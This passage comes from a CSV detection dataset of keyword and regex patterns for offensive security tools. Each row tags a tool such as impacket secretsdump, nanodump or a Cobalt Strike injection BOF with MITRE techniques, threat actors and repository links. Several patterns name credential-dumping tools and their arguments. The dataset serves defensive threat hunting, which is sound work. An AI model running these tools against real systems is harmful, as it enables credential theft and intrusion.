Sandworm","C2","https://github.com/apokryptein/secinject","1","1","N/A","N/A","10","10","94","23","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z","58287" "*secinject.x64*",".{0,1000}secinject\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/apokryptein/secinject","1","1","N/A","N/A","10","10","94","23","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z","58288" "*secinject.x86*",".{0,1000}secinject\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt 
Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/apokryptein/secinject","1","1","N/A","N/A","10","10","94","23","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z","58289" "*secinject/src*",".{0,1000}secinject\/src.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/apokryptein/secinject","1","1","N/A","N/A","10","10","94","23","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z","58290" "*--seclogon-leak-local*",".{0,1000}\-\-seclogon\-leak\-local.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","58291" "*--seclogon-leak-remote*",".{0,1000}\-\-seclogon\-leak\-remote.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","58292" "*SeCreatePagefilePrivilegePoC.exe*",".{0,1000}SeCreatePagefilePrivilegePoC\.exe.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","58293" "*SeCreateTokenPrivilegePoC.exe*",".{0,1000}SeCreateTokenPrivilegePoC\.exe.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","58294" "*secrect_key = ""iamafuckingnerd""*",".{0,1000}secrect_key\s\=\s\""iamafuckingnerd\"".{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","#content","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","58295" "*secredump.exe*",".{0,1000}secredump\.exe.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","N/A","10","5","421","53","2025-01-04T14:16:46Z","2022-02-15T20:51:46Z","58296" "*secret_fragment_exploit.py */_fragment*",".{0,1000}secret_fragment_exploit\.py\s.{0,1000}\/_fragment.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","58297" "*SecretFinder.py*",".{0,1000}SecretFinder\.py.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","N/A","10","2153","405","2024-05-26T09:36:41Z","2020-06-08T10:50:12Z","58298" "*SecretFinder-master.zip*",".{0,1000}SecretFinder\-master\.zip.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","N/A","10","2153","405","2024-05-26T09:36:41Z","2020-06-08T10:50:12Z","58299" "*secrets/secrets_manager/secrets.txt*",".{0,1000}secrets\/secrets_manager\/secrets\.txt.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered 
Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","58300" "*secrets_dump*",".{0,1000}secrets_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","58301" "*secrets_dump_dcsync*",".{0,1000}secrets_dump_dcsync.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","58302" "*secretsdump *--silent*",".{0,1000}secretsdump\s.{0,1000}\-\-silent.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","58303" "*secretsdump -sam *",".{0,1000}secretsdump\s\-sam\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","58304" 
"*secretsdump*",".{0,1000}secretsdump.{0,1000}","offensive_tool_keyword","POC","Zerologon CVE exploitation (could be other malicious tools too)","T1210 - T1068","TA0001","N/A","N/A","Exploitation tool","https://github.com/risksense/zerologon","1","1","N/A","N/A","N/A","7","657","146","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z","58305" "*secretsdump.*.pyc*",".{0,1000}secretsdump\..{0,1000}\.pyc.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","58306" "*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","58307" 
"*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","58308" "*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Credential Access","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","58309" "*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","58310" "*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","58311" "*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. 
is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","58312" "*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58313" "*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","noPac","script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","58314" "*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","1","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","58315" "*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","58316" "*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","secretsdump","secretdump.py from impacket 
- https://github.com/fortra/impacket","T1003.003","TA0006","Operation Wocao","Black Basta - Rhysida - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - ALLANITE","Credential Access","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","58317" "*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","Dispossessor","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","1","N/A","N/A","10","7","609","74","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z","58318" "*secretsquirrel/the-backdoor-factory*",".{0,1000}secretsquirrel\/the\-backdoor\-factory.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","58319" "*SecScanC2_admin *",".{0,1000}SecScanC2_admin\s.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","0","#P2P","N/A","10","","N/A","","","","58320" "*SecScanC2_admin_*",".{0,1000}SecScanC2_admin_.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. 
The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","#P2P","N/A","10","","N/A","","","","58321" "*SecScanC2_node *",".{0,1000}SecScanC2_node\s.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","0","#P2P","N/A","10","","N/A","","","","58322" "*SecScanC2_node_*",".{0,1000}SecScanC2_node_.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","#P2P","N/A","10","","N/A","","","","58323" "*SecScanC2-main*",".{0,1000}SecScanC2\-main.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. 
The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","#P2P","N/A","10","","N/A","","","","58324" "*sec-shinject *",".{0,1000}sec\-shinject\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/apokryptein/secinject","1","0","N/A","N/A","10","10","94","23","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z","58325" "*securesean/DecryptAutoLogon*",".{0,1000}securesean\/DecryptAutoLogon.{0,1000}","offensive_tool_keyword","DecryptAutoLogon","Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon","T1003.001 - T1555.003 - T1003.006","TA0006","N/A","N/A","Credential Access","https://github.com/securesean/DecryptAutoLogon","1","1","N/A","N/A","10","3","218","32","2020-12-05T16:14:28Z","2020-12-03T20:38:59Z","58326" "*securesocketfunneling*",".{0,1000}securesocketfunneling.{0,1000}","offensive_tool_keyword","securesocketfunneling","Secure Socket Funneling (SSF) is a network tool and toolkit It provides simple and efficient ways to forward data from multiple sockets (TCP or UDP) through a single secure TLS link to a remote computer","T1071.001 - T1573 - T1572","TA0003 - TA0009 - TA0011 